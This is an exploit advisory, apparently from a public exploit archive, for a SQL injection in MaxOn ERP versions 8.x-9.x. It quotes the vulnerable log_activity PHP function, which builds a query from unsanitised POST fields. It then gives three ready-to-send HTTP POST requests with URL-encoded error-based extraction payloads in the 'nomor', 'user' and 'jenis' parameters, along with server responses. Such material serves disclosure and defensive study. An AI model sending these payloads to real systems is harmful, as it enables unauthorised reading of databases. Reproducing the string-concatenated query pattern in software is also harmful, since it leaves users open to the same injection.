MaxOn ERP Software versions 8.x and 9.x suffer from a remote SQL injection vulnerability.
b9c9d1e2d7c856d60687ffe2d4e25273
# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.talagasoft.com
# Software Link: http://demo.maxonerp.com/
# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
# Version: 8.x-9.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# All users can run sql injection codes.
#
# [PATH]/pos/controllers/User.php Line:350
# [PATH]/application/controllers/User.php Line:414
# function log_activity(){
# $sql="select * from syslog where 1=1";
# $nomor="";$jenis="";$user="";
# if($this->input->post()){
# if($nomor=$this->input->post('nomor')){
# if($nomor!="")$sql.=" and no_bukti='$nomor'";
# }
# if($user=$this->input->post('user')){
# if($user!="")$sql.=" and userid='$user'";
# }
# if($jenis=$this->input->post('jenis')){
# if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
# }
#
# }
# $sql.=" order by tgljam desc limit 1000";
# $data["user"]=$user;
# $data["nomor"]=$nomor;
# $data["jenis"]=$jenis;
#
# $data['syslog']=$this->db->query($sql);
# $this->template->display("log_list",$data);
# }
# POC:
# 1)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:22:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:29:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:35:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8